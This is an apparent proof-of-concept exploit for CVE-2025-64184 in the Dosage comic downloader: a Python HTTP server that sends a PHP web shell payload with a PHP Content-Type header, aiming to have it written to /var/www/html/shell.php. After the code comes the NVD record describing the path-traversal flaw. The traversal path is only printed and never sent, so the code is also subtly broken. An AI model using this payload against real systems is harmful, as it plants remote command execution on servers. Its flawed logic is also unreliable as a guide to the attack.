CVE-2025-64184

#!/usr/bin/env python3 """ CVE-2025-64184 PoC - Malicious HTTP Server Simulates an attacker-controlled comic server that exploits the path traversal vulnerability in Dosage <= 3.1 """ from http.server import HTTPServer, BaseHTTPRequestHandler import os class ExploitHandler(BaseHTTPRequestHandler): def do_GET(self): # Malicious Content-Type header with executable extension # This tricks Dosage into saving files with .php extension content_type = "application/x-httpd-php" # Malicious PHP code to be written to the target file payload = b"<?php system($_GET['cmd']); ?>" # Directory traversal in filename (basename会被清理，但扩展名来自Content-Type) # Target: /var/www/html/shell.php malicious_url = "/comic/../../../../var/www/html/shell" self.send_response(200) self.send_header("Content-Type", content_type) self.send_header("Content-Length", str(len(payload))) self.end_headers() self.wfile.write(payload) print(f"[*] Sent malicious response:") print(f" Content-Type: {content_type}") print(f" Payload will be saved with .php extension") print(f" Target: {malicious_url}.php") def log_message(self, format, *args): print(f"[HTTP] {args[0]}") def main(): server = HTTPServer(('0.0.0.0', 8080), ExploitHandler) print("[*] CVE-2025-64184 Exploit Server") print("[*] Listening on port 8080...") print("[*] Wait for victim to download comic from this server") server.serve_forever() if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-64184", "sourceIdentifier": "[email protected]", "published": "2025-11-07T04:15:46.947", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dosage is a comic strip downloader and archiver. When downloading comic images in versions 3.1 and below, Dosage constructs target file names from different aspects of the remote comic (page URL, image URL, page content, etc.). While the basename is properly stripped of directory-traversing characters, the file extension is taken from the HTTP Content-Type header. This allows a remote attacker (or a Man-in-the-Middle, if the comic is served over HTTP) to write arbitrary files outside the target directory (if additional conditions are met). This issue is fixed in version 3.2."}, {"lang": "es", "value": "Dosage es un programa para descargar y archivar. Cuando descarga imágenes de cómics en las versiones 3.1 e inferiores, Dosage construye los nombres de archivo de destino a partir de diferentes aspectos del cómic remoto (URL de la página, URL de la imagen, contenido de la página, etc.). Aunque el nombre base se limpia correctamente de caracteres de recorrido de directorio, la extensión del archivo se toma del encabezado HTTP Content-Type. Esto permite a un atacante remoto (o a un Man-in-the-Middle, si el cómic se sirve a través de HTTP) escribir archivos arbitrarios fuera del directorio de destino (si se cumplen condiciones adicionales). Este problema se corrige en la versión 3.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/webcomics/dosage/commit/336a9684191604bc49eed7296b74bd582151181e", "source": "[email protected]"}, {"url": "https://github.com/webcomics/dosage/security/advisories/GHSA-4vcx-3pj3-44m7", "source": "[email protected]"}]}}